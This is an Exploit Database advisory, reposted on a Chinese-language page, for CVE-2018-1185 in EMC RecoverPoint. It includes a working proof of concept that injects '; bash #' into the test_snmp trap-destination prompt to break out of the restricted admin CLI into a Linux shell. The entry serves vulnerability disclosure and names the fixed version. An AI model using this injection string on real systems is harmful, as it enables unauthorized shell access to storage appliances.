EMC RecoverPoint 4.3 – ‘Admin CLI’ Command Injection

• Exploit Database
• 120 阅读

• 作者： Paul Taylor
  日期： 2018-05-11
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/44614/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28

  # Exploit Title: EMC RecoverPoint 4.3 - Admin CLI Command Injection # Version: RecoverPoint prior to 5.1.1 RecoverPoint for VMs prior to 5.0.1.3 # Date: 2018-05-11 # Exploit Author: Paul Taylor # Github: https://github.com/bao7uo # Tested on: RecoverPoint for VMs 4.3, RecoverPoint 4.4.SP1.P1 # CVE: CVE-2018-1185 1. Description   An OS command injection vulnerability resulting in code execution as the built-in admin user.   A crafted entry can result in the ability to escape from the restricted admin user's menu driven CLI to a full Linux operating system shell in the context of the admin user. The attack vector is the trap destination (hostname/IP) parameter of the test_snmp function. 2. Proof of Concept   RecoverPoint> test_snmp Enter the trap destination (host name or IP) > /dev/null 2>&1 ; bash # admin@RecoverPoint:/home/kos/cli$ exit exit Test completed successfully. RecoverPoint>   3. Solution:   Update to latest version of RecoverPoint